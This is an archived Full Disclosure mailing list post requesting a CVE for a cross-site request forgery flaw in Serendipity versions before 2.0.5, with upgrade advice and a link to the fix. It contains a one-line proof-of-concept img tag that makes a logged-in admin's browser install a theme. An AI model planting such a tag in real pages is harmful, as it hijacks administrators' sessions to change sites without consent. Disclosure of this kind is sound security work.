[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] CVE Request:CSRF in Serendipity allows attacker installs any themes

To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] CVE Request:CSRF in Serendipity allows attacker installs any themes
From: Wester 95 <evilzyzeng@xxxxxxxxxxx>
Date: Sun, 9 Apr 2017 10:17:46 +0000

Hi team,


I would like to request one CVE id, thank you!


Details

======


Software: s9y Serendipity

Version: <2.0.5

Homepage: https://docs.s9y.org/


=======


Description

================

Get type CSRF in Serendipity allows attacker installs any themes, no token here.


POC:


========


include this in the page ,then attack will occur:


<img 
src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartleby”;>



Mitigations

=======


update to Serendipity v2.1.x


========


FIX:


==========


https://github.com/s9y/Serendipity/issues/452


Best regards,


Zhiyang Zeng of Tencent security platform department


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] Moxa MX AOPC-Server v1.5 XML External Entity
Next by Date: [FD] CVE Request:XSS Injection in Email MyCode (MyBB <1.8.11)
Previous by thread: [FD] Moxa MX AOPC-Server v1.5 XML External Entity
Next by thread: [FD] CVE Request:XSS Injection in Email MyCode (MyBB <1.8.11)
Index(es):
- Date
- Thread